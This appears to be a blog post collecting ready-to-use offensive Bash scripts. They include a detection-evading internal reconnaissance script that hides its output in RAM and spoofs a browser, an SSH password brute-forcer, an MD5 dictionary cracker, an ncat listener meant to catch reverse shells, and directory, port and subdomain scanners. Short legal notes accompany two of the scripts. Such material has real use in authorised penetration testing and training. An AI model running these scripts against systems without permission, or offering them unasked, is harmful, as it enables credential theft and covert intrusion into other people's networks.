Bash Scripts Stash
Dec 19, 2025
- SSH brute-forcing with sshpass
- Vulnerability scanner
- Nmap automator
- Log parser
- Listen with netcat
- Hash cracker
- Banner grabber
- Web dir buster
- Port scanner
- Subdomain scanner
Bash scripting is highly valuable in offensive security because it leverages the principle of living off the land, using native tools and interpreters already present on target systems rather than introducing foreign binaries that could trigger defenses. This approach minimizes the operational footprint and helps maintain stealth, as scripts blend into normal administrative activity. Bash enables rapid automation of reconnaissance, privilege escalation checks, and lateral movement using built-in utilities like curl, wget, grep, and awk, reducing dependency on external frameworks. By chaining these commands in scripts, attackers can execute complex tasks without dropping large executables, making detection harder for signature-based defenses. Ultimately, Bash scripting aligns with low-noise, low-risk methodologies, allowing operators to remain covert while achieving objectives efficiently.
For example, consider the following code. Why is this "stealthy"?:
- Living off the land: Uses utilities commonly present on Linux systems (arp, curl, ss, awk). No external binaries are dropped.
- Low operating footprint: Writes to /dev/shm (RAM‑backed) to avoid persistent disk artifacts and reduce I/O.
- Noise reduction: Uses HEAD requests, short timeouts, and random jitter; avoids aggressive port scans—prefers passive discovery via ARP.
- Blends with admin behaviour: User‑Agent + headers resemble normal browser/admin traffic; slow cadence reduces anomaly spikes.
#!/usr/bin/env bash # stealth_enum.sh — low-noise internal web/service reconnaissance set -Eeuo pipefail # In-memory scratch space (cleared on reboot on most Linux systems) SCRATCH=/dev/shm/lotl mkdir -p "$SCRATCH" # Quiet logging helper log() { printf '%s %s\n' "$(date +'%H:%M:%S')" "$*" >> "$SCRATCH/enum.log"; } # Gentle jitter: 0.7–2.3s jitter() { awk -v seed="$RANDOM" 'BEGIN{srand(seed); print 0.7 + rand()*1.6}' } # Candidate hosts from local ARP cache (passive discovery, no scans) HOSTS_FILE="$SCRATCH/hosts.txt" arp -n | awk 'NR>1 && $1 ~ /^[0-9.]+$/ {print $1}' | sort -u > "$HOSTS_FILE" # If none found, quietly exit [[ -s "$HOSTS_FILE" ]] || { log "No ARP hosts found; exiting."; exit 0; } # Prefer system CA bundle; use HEAD to minimize content UA="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122 Safari/537.36" # Enumerate common web ports very slowly and capture minimal metadata while read -r host; do for port in 80 443 8080 8443; do sleep "$(jitter)" # 1) TCP reachability with minimal timeout; avoids long hangs if timeout 2 bash -c " </dev/tcp/$host/$port" 2>/dev/null; then log "open $host:$port" # 2) Gentle banner: HEAD with compression and short timeout timeout 3 curl -sS --compressed \ -A "$UA" \ -H 'Accept: text/html,*/*;q=0.8' \ -I "http://$host:$port/" 2>/dev/null \ | awk 'BEGIN{h="";t="";s=""} tolower($1)=="server:"{s=$0} tolower($1)=="x-powered-by:"{t=$0} tolower($1)=="location:"{h=$0} END{if(s!="")print s; if(t!="")print t; if(h!="")print h}' \ >> "$SCRATCH/web_banners.txt" fi done done < "$HOSTS_FILE" # Optional: correlate local listeners without scanning (reads kernel sockets) # Captures only service names and ports; no payloads ss -tnlp 2>/dev/null \ | awk 'NR>1 {split($4,a,":"); if (a[length(a)] ~ /^[0-9]+$/) print a[length(a)], $NF}' \ >> "$SCRATCH/listeners.txt" # Minimal terminal output; artifacts kept in-memory echo "Stealth enum complete. In-memory results:" echo " - $SCRATCH/enum.log (open hosts/ports)" echo " - $SCRATCH/web_banners.txt (server/x-powered-by/location headers)" echo " - $SCRATCH/listeners.txt (local listeners)" # Clean-up trap (optional: uncomment to delete immediately after viewing# Clean-up trap (optional: uncomment to delete immediately after viewing)
So let's dive into some more ready-to-use examples...
SSH brute-forcing with sshpass
Performs a credential brute force attempt against an SSH service on a given host by trying every combination of usernames in users.txt and passwords in passwords.txt. It uses sshpass to non‑interactively supply passwords to the ssh client.
⚠️ Legal/ethical note: Only run brute‑force tests against systems you own or have explicit written permission to test. Unauthorized access attempts are illegal and may trigger security controls.
#!/bin/bash # Save as ssh_brute.sh. Requires 'sshpass': sudo apt-get install sshpass # Create users.txt and passwords.txt if [ -z "$1" ]; then echo "Usage: ./ssh_brute.sh <host>" exit 1 fi HOST=$1 USERS="users.txt" PASSWORDS="passwords.txt" while read user; do while read pass; do echo "[*] Trying $user:$pass..." # sshpass provides the password to the ssh command # -o StrictHostKeyChecking=no prevents prompts about new hosts # The 'true' command at the end just exits successfully if login works if sshpass -p "$pass" ssh -o StrictHostKeyChecking=no "$user@$HOST" "true"; then echo "[+] Success! $user:$pass" exit 0 fi done < "$PASSWORDS" done < "$USERS"
Vulnerability scanner
This script takes a single argument, a URL (e.g., http://example.com). It sends a HEAD request (curl -I) to fetch only HTTP response headers, then extracting the Server header line (e.g., Server: Apache/2.4.29 (Ubuntu)). It then compares that header to:
- A specific version marker you’ve labeled as vulnerable: Apache/2.4.29.
- A novelty case for Python’s built‑in server: SimpleHTTP/0.6 Python.
- Prints a verdict based on the match (vulnerable, cute message, or not found).
#!/bin/bash # Save as vuln_scanner.sh if [ -z "$1" ]; then echo "Usage: ./vuln_scanner.sh <url>" exit 1 fi URL=$1 VULNERABLE_SERVER="Apache/2.4.29" # 'curl -I' sends a HEAD request to get only headers # '-s' silences any output # 'grep -i' makes the search case-insensitive SERVER_HEADER=$(curl -s -I "$URL" | grep -i "Server:") echo "[*] Target server header: $SERVER_HEADER" # Check if the vulnerable string is within the header if [[ "$SERVER_HEADER" == *"$VULNERABLE_SERVER"* ]]; then echo "[!] VULNERABLE: Found outdated server version: $SERVER_HEADER" elif [[ "$SERVER_HEADER" == *"SimpleHTTP/0.6 Python"* ]]; then echo "[+] You are running a simple HTTP server with python, how cute!" else echo "[-] Not found to be vulnerable to this specific check." fi
Nmap automator
Why you’d automate Nmap like this:
-
Repeatability & auditability Engagements often need the same baseline scans run multiple times (daily, per sprint, or pre/post‑patch). Automating from a targets.txt list guarantees consistent methodology, while per‑host files produce a clear audit trail you can reference in reports.
-
Organization and correlation The nmap_scans/host_scan.txt pattern makes it trivial to:
- Diff results between scan runs (git diff, diff, meld).
- Grep across all outputs for particular CVE‑prone versions or services. This supports rapid triage and prioritization.
-
Version intelligence for vulnerability mapping
-sVgathers service banners/versions. That feeds downstream checks (e.g., quick “is version ≤ X” matches), making it faster to map to known vulnerabilities during recon/validation phases without immediately pulling in heavier scanners. -
Operational safety vs speed
-T4is a balanced timing profile. It’s quicker than defaults, but less likely to overwhelm fragile services or trigger rate‑limit alarms compared to-T5. This is useful when you need reasonable speed on approved testing windows while still being considerate of target stability. -
Low complexity, easy handoff A single Bash file with targets.txt is easy to share with teammates, slot into CI pipelines, or schedule with cron. This helps operationalize recon as part of secure development practices (e.g., nightly checks of dev/staging).
#!/bin/bash # Save as nmap_automator.sh # Create a file named targets.txt TARGET_FILE="targets.txt" OUTPUT_DIR="nmap_scans" mkdir -p "$OUTPUT_DIR" # -p prevents error if directory already exists while read target; do # Skip empty lines if [ -z "$target" ]; then continue; fi echo "[*] Scanning $target..." OUTPUT_FILE="$OUTPUT_DIR/${target}_scan.txt" # -oN saves the output in normal format nmap -sV -T4 -oN "$OUTPUT_FILE" "$target" echo "[+] Scan for $target complete. Results saved to $OUTPUT_FILE" done < "$TARGET_FILE"
Log parser
This script contains some red-hot Linux commands so I'll break it down, line‑by‑line:
- Existence check: If access.log isn't present, exit with an error.
- Message: Prints a header describing the upcoming summary.
- Pipeline:
- — extracts the first column from each line, which in common web server access logs (e.g., Nginx/Apache) is the client IP.
awk '{print $1}' "$LOG_FILE" sort— sorts the IPs so identical values are adjacent.uniq -c— collapses duplicates and counts occurrences per unique IP.sort -nr— numerically sorts the counts in descending order (most frequent first).head -n 10— shows the top 10 most active IPs hitting the server.
Why you’d do this (offensive & defensive context):
- Triage "noisy" sources quickly: During a test, you often want to know which IPs generate the most requests—good for identifying brute‑force origins, scanners, or misconfigured health checks.
- Anomaly detection: A few IPs dominating traffic may indicate credential stuffing, cart enumeration, or path fuzzing activity.
- Operationally lightweight: Uses standard Unix tools available on most systems—no external dependencies, fast, easy to run in constrained environments.
- Evidence collection: Produces a clear top‑N list suitable for reports or follow‑up actions (blocking, rate limiting, deeper inspection).
#!/bin/bash # Save as log_parser.sh # Create a sample access.log file LOG_FILE="access.log" if [ ! -f "$LOG_FILE" ]; then echo "Error: $LOG_FILE not found." exit 1 fi echo "Top 10 most frequent IP addresses:" # 'awk' prints the first field (the IP), sort groups them, # 'uniq -c' counts unique occurrences, 'sort -nr' sorts numerically in reverse, # and 'head -n 10' shows the top 10. awk '{print $1}' "$LOG_FILE" | sort | uniq -c | sort -nr | head -n 10
Listen with netcat
Why you’d do this (offensive‑security context):
-
Catch reverse shells during exploitation: When exploiting a remote service or running a payload that calls back to your machine, you need a listener to receive that connection and interact with the shell or data stream.
-
Network path validation: Before firing a full payload, you can verify whether the target can reach your port (egress rules, NAT, firewall path) by initiating a connection from the target (ncat your_ip 4444) and confirming you see/receive data.
-
Low‑footprint troubleshooting: Ncat is tiny, ubiquitous on many toolkits, and doesn’t require complex configuration—useful for quick tests in constrained environments.
-
Multi‑session collection: With
-k, you can accept multiple callbacks without restarting the listener. Useful when testing multiple hosts or repeating the exploit.
#!/bin/bash # Save as listener.sh # Uses netcat (ncat) to create a powerful listener. if ! command -v ncat &> /dev/null; then echo "netcat (ncat) is not installed. Please install it to use this script." exit 1 fi PORT=4444 echo "[*] Listening on port $PORT..." # -l for listen mode, -v for verbose, -p for port, -n to skip DNS # Some versions of nc use -e to execute a program on connect, but for a simple # interactive shell, this is the most common and reliable form. # '-k' - keep connection open ncat -k -lvnp $PORT
Hash cracker
Performs a dictionary attack against a single MD5 hash. For each candidate password read from passwords.txt, it computes the MD5 digest and compares it to the target hash you provide on the command line. If any candidate matches, it prints the plaintext and exits.
⚠️ Ethical note: Only crack hashes that you own or have explicit written permission to test. Unauthorized cracking can be illegal and unethical.
#!/bin/bash # Save as hash_cracker.sh # Requires md5sum command # sunshine = 0571749e2ac330a7455809c6b0e7af90 if [ -z "$1" ]; then echo "Usage: ./hash_cracker.sh <md5_hash>" exit 1 fi HASH_TO_CRACK=$1 WORDLIST="passwords.txt" while read password; do # 'echo -n' prevents a newline character from being part of the hash # 'cut' command extracts just the hash part from the md5sum output GUESS=$(echo -n "$password" | md5sum | cut -d ' ' -f 1) if [ "$GUESS" == "$HASH_TO_CRACK" ]; then echo "[+] Password found: $password" exit 0 fi done < "$WORDLIST" echo "[-] Password not found in list."
Banner grabber
Why banner grabbing is useful
Banner grabbing is the practice of connecting to a service and reading its initial response string or headers to learn what software and version is running. This is valuable because:
- Rapid reconnaissance:
- Quickly fingerprints services (e.g., OpenSSH_9.3p2, Microsoft-IIS/10.0, Exim 4.x).
- Helps map the attack surface (which services, which versions) before heavier scans.
- Version‑based vulnerability mapping:
- Many banners expose versions. Matching versions to known CVEs lets you prioritize targets or validate findings faster.
- Example: an outdated Apache/2.4.29 banner suggests checking for historical issues and misconfigurations.
- Protocol verification and triage:
- Confirms you’re talking to the expected protocol on a given port (e.g., SMTP speaks 220 …, FTP speaks 220 …, SSH sends SSH-2.0-…).
- Distinguishes proxy/CDN vs origin behavior (helpful in web apps), guides next steps (HTTP request crafting, TLS tests, etc.).
- Low‑noise, low‑footprint
- A simple TCP connect and single line read is far less noisy than full vulnerability scans.
- Fits “living off the land” principles: you can do it with built‑in tools (Bash /dev/tcp) or ubiquitous small utilities (netcat/ncat), reducing the chance of triggering signatures for large scanner payloads.
- Defensive hardening feedback
- Banners often leak unnecessary information (exact versions). Noting exposed banners helps defenders decide where to suppress or sanitize headers (e.g., remove/modify Server headers in HTTP, or tune SSH VersionAddendum).
#!/bin/bash # Save as banner_grabber.sh if [ -z "$2" ]; then echo "Usage: ./banner_grabber.sh <ip> <port>" exit 1 fi IP=$1 PORT=$2 # Use ncat (ncat) if available, a powerful networking utility. # '-v' for verbose, # '-n' to skip DNS, # '-w' for timeout, # '-z' to just scan. # For banner grabbing, we use a timeout and pipe an empty string. if command -v ncat &> /dev/null; then echo | ncat -w 2 -v -z "$IP" "$PORT" else # Fallback to the /dev/tcp method if nc isn't installed # 'exec 3<>' - opens a bidirectional file descriptor (3) to IP:PORT exec 3<>/dev/tcp/$IP/$PORT # Read the first line from the connection read -r banner <&3 echo "[+] Port $PORT Banner: $banner" # close the descriptor 3 for reading and writing exec 3<&- exec 3>&- fi
Web dir buster
Why you’d do directory/path discovery
- Attack surface mapping:
- Hidden or unlinked paths (e.g., /admin, /backup, /old, /api/v1, /debug) often expose functionality, data, or configuration you can leverage.
- Enumerating these paths early gives you a roadmap for follow‑up testing (auth checks, parameter manipulation, business logic flaws).
- Versioning & legacy endpoints
- Many apps keep older builds or staging folders online (e.g., /v2/, /beta/, /old/), which can include known vulnerabilities or weaker controls compared to the main app.
- Access control testing
- Responses like
401 Unauthorizedor403 Forbiddenindicate protected resources; these are priority targets for authorization bypass, IDOR, and misconfiguration tests.
- Low‑noise reconnaissance
- This approach is living off the land: a single
bash + curlpipeline, short timeouts, and no bulky scanner binaries. It blends with normal admin traffic and keeps your operating footprint small.
#!/bin/bash # Save as web_dir_buster.sh # Create a file named dir_list.txt if [ -z "$1" ]; then echo "Usage: ./web_dir_buster.sh <target_url>" echo "Example: ./web_dir_buster.sh http://127.0.0.1" exit 1 fi URL=$1 WORDLIST="dir_list.txt" while read dir; do # 'curl' fetches the URL. # '-s' silences progress, # '-o' sends output to null, # and '-w' tells curl only to print the http status code. # '--connect-timeout' handles hangs. STATUS=$(curl -s -o /dev/null -w "%{http_code}" --connect-timeout 3 "$URL/$dir") if [ "$STATUS" -ne 404 ]; then echo "[+] Found: $URL/$dir [Status: $STATUS]" fi done < "$WORDLIST"
Port scanner
Performs a very lightweight TCP port reachability check against a handful of common ports on a single target host—using only Bash built‑ins and timeout. This is effectively a SYN+connect style probe (full TCP connect), but implemented via Bash—no external scanners.
Why you’d do this (instead of using Nmap)
There are solid reasons to prefer a tiny, built‑in reachability check during certain phases of an engagement:
- Living off the land / minimal footprint
- No need to drop or install large tooling—only Bash (present on most Linux/UNIX targets and jump hosts) plus timeout.
- Reduces the chance of tripping software whitelists, inventory checks, or file‑integrity monitoring that flag “scanner binaries”.
- Stealthier operational profile
- A few targeted connect attempts on specific ports can blend with normal administrative traffic better than broad, aggressive scans.
- Useful when you’re validating reachability before launching a payload (e.g., confirming that 443 egress works for a callback).
- Speed & simplicity for quick checks
- You might only need to know “is any of 22/80/443/8080 open?” to decide the next move.
- One short connect per port with a 1‑second timeout is fast and clearly bounded.
- Scriptability & portability
- Bash one‑liners are easy to inline in other scripts, CI pipelines, or cloud-init steps.
- No XML/grepable outputs or additional flags to remember—just success/failure per port.
- Reduced signature / fewer heuristics triggered
- Nmap is powerful but may be associated with recognizable scan patterns, packet timings, and fingerprints if misconfigured.
- A minimalist connect test can be lower‑signal to anomaly‑based detection.
TL;DR: When you need a tiny, ephemeral, and low‑noise reachability probe, this approach is ideal. When you need depth (service/version detection, host discovery, NSE scripts), use Nmap.
#!/bin/bash # Save as port_scanner.sh if [ -z "$1" ]; then echo "Usage: ./port_scanner.sh <ip_address>" exit 1 fi TARGET=$1 PORTS="21 22 80 443 8080" echo "Scanning $TARGET..." for port in $PORTS; do # This syntax sends nothing to the target but establishes a connection # The timeout command prevents it from hanging for too long # '(...)' - runs a command inside a subshell, useful isolating the command # Bash has a special feature: '/dev/tcp/host/port' - Writing to this pseudo‑file attempts to # open a TCP connection to the given host ($TARGET) and port ($port). # '&>/dev/null' - silences all output from the subshell (timeout 1 bash -c "echo > /dev/tcp/$TARGET/$port") &>/dev/null && echo "[+] Port $port is open" done
Subdomain scanner
Enumerates subdomains for a given root domain using a wordlist and DNS lookups. Any entry that resolves (i.e., DNS returns an answer) is reported as "Found".
Why you’d do this (and when)
Subdomain enumeration expands your view of the attack surface:
- Find hidden assets: Internal dashboards, APIs, staging/beta sites, forgotten services, or legacy endpoints often live under distinct subdomains (e.g.,
jira.example.com,grafana.example.com,v1-api.example.com). - Prioritize targets: Each discovered host can expose different ports/services, software stacks, and configurations—useful for triage and chaining attacks.
- Low‑noise recon: DNS queries are typically less intrusive than active web or port scans. They often blend with normal operational traffic and keep your operating footprint small.
- Quick validation: Before aggressive scanning, confirming which names resolve keeps follow‑up probes focused and efficient.
#!/bin/bash # Save as subdomain_scanner.sh and run: chmod +x subdomain_scanner.sh # Requires a subdomains.txt file # -z = true if length of condition = 0 if [ -z "$1" ]; then echo "Usage: ./subdomain_scanner.sh <domain>" exit 1 fi DOMAIN=$1 WORDLIST="subdomains.txt" # If the wordlist file does not exist, exit if [ ! -f "$WORDLIST" ]; then echo "Error: $WORDLIST not found." exit 1 fi while read sub; do # The 'host' command performs a DNS lookup. We silence output with &> /dev/null # '&&' means the second command only runs if the first succeeds # '&>' - pipe standard output and errors to /dev/null host "$sub.$DOMAIN" &> /dev/null && echo "[+] Found: $sub.$DOMAIN" done < "$WORDLIST"
Conclusion
Living off the land tactics are extremely prevalent in adversarial TTPs, as presented by BitDefender Labs research. While bash scripting is not a frequently abused "tool" in itself, it does demonstrate the principle of using system resources for what would ordinarily be nefarious purposes.
